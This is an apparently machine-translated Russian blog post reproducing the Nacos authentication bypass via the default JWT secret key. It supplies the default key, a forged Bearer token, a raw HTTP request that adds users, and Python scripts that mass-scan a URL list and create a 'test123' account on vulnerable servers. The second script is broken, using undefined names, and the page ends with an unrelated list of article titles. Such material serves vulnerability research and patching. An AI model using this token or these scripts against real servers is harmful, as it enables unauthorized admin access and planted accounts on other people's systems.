Повторение уязвимости — обход аутентификации личности Nacos
Обход аутентификации Nacos
Поскольку значение secret.key установлено по умолчанию
### The default token(Base64 String):
nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
### 2.1.0 После версии
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789Доступный https://jwt.io/#debugger-io Генерируйте полезные токены
Если вам нужно войти в nacos, введите любой пароль учетной записи для перехвата пакетов.
Замените пакет echo следующим:
HTTP/1.1 200
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Type: application/json; charset=utf-8
Date: Tue, 14 Mar 2023 16:34:47 GMT
Content-Length: 206
{
"accessToken": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
"tokenTtl": 18000,
"globalAdmin": false,
"username": "nacos"
}Войти напрямую
Добавляйте пользователей напрямую
POST /nacos/v1/auth/users HTTP/1.1
Host:
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
username=test&password=test
Пакетная проверка
import requests
import urllib3
urllib3.disable_warnings()
# Определите пользовательские пути и заголовки
custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2'
proxies = {'http': 'http://127.0.0.1:8080'}
header = {
"User-Agent": "Nacos-Server",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Pragma": "no-cache",
"Te": "trailers",
"Cache-Control": "no-cache",
}
# Прочитайте список URL-адресов из файла url.txt.
with open('url.txt', 'r') as f:
urls = f.read().splitlines()
# Отправляйте запросы GET в цикле и определяйте результаты эха.
for url in urls:
full_url = url + custom_path # Объединить полный URL-адрес
try:
response = requests.get(full_url,proxies=proxies, headers=header,verify=False,timeout=2)
if response.status_code == 200 and response.content.find(b"pageNumber") != -1:
print(f'{url} Есть обход аутентификации nacos лазейки')
else:
print(f'{url} Нет Есть обход аутентификации nacos лазейки')
except requests.exceptions.RequestException as e:
print(f'{url} Не удалось получить доступ {e}')
Скриптовое добавление пользователей
import sys
import requests
from termcolor import colored
import urllib3
urllib3.disable_warnings()
proxies = {'http': 'http://127.0.0.1:8080'}
# Получить параметры командной строки URL
if len(sys.argv) < 2:
print("Usage: python test.py <url>")
sys.exit(1)
url = sys.argv[1]
post_url = "/nacos/v1/auth/users"
request_url = url + post_url
headers = {
"User-Agent": "Nacos-Server",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
}
data = {
"username": "test123",
"password": "test123",
}
response = requests.post(request_url, headers=headers, data=data, proxies=proxies,verify=False)
if response.status_code == 200 and response.content.find(b"ok") != -1:
print(colored('[*] ' + url + ' Есть обход лазейки nacos аутентификации! ', 'green'))
print(colored('Пользователь test123/test123 создан', 'green'))
else:
print(colored('[-] ' + url + ' Нет Есть обход лазейки nacos аутентификации! \n', 'red'))
threads = []
for url in urls:
t = threading.Thread(target=send_request, args=(url,))
threads.append(t)
t.start()
# Дождитесь завершения всех потоков
for t in threads:
t.join()
Как настроить размер экрана в PR. Учебное пособие по настройке размера видео в PR [подробное объяснение]
Элегантный и мощный: упростите операции ElasticSearch с помощью easy-es
Проект аутентификации по микросервисному токену: концепция и практика
【Java】Решено: org.springframework.http.converter.HttpMessageNotWritableException.
Изучите Kimi Smart Assistant: как использовать сверхдлинный текст, чтобы открыть новую сферу эффективной обработки информации
Начало работы с Docker: использование томов данных и монтирования файлов для хранения и совместного использования данных
Использование Python для реализации автоматической публикации статей в публичном аккаунте WeChat
Разберитесь в механизме и принципах взаимодействия потребителя и брокера Kafka в одной статье.
Spring Boot — использование Resilience4j-Circuitbreaker для реализации режима автоматического выключателя_предотвращения каскадных сбоев
13. Springboot интегрирует Protobuf
Примечание. Инструмент управления батареями Dell Dell Power Manager
Общая интерпретация класса LocalDate [java]
[Базовые знания ASP.NET Core] -- Веб-API -- Создание и настройка веб-API (1)
Настоящий бой! Подключите Passkey к своему веб-сайту для безопасного входа в систему без пароля.
Руководство по настройке Nginx: как найти, интерпретировать и оптимизировать настройки Nginx в Linux
Typecho отображает использование памяти сервера
Как вставить элемент перед указанным ключом в ассоциативный массив в PHP
swagger2 экспортирует API как текстовый документ (реализация Java) [легко понять]
Выбор фреймворка nodejs Express koa egg MidwayJS сравнение NestJS
Руководство по загрузке, установке и использованию SVN «Рекомендуемая коллекция»
Интерфейс PHPforwarding_php отправляет запрос на получение
Создавайте и защищайте связь в реальном времени с помощью SignalR и Azure Active Directory.
ВичатПубличная платформаразвивать(три)——ВичатQR-кодгенерировать&Сканировать кодсосредоточиться на
[Углубленное понимание Java IO] Используйте InputStreamReader для чтения содержимого файла и легкого выполнения задач преобразования текста.
сравнение строк PHP
9 сценариев асинхронного сбоя @Async
Эффективная обработка запланированных задач: углубленное изучение секретов библиотеки APScheduler на Python
Рекомендации по облегченному артефакту развязки внутренних компонентов Spring Event (событие Spring)
Go: Лесоруб-лесоруб на колесах Введение
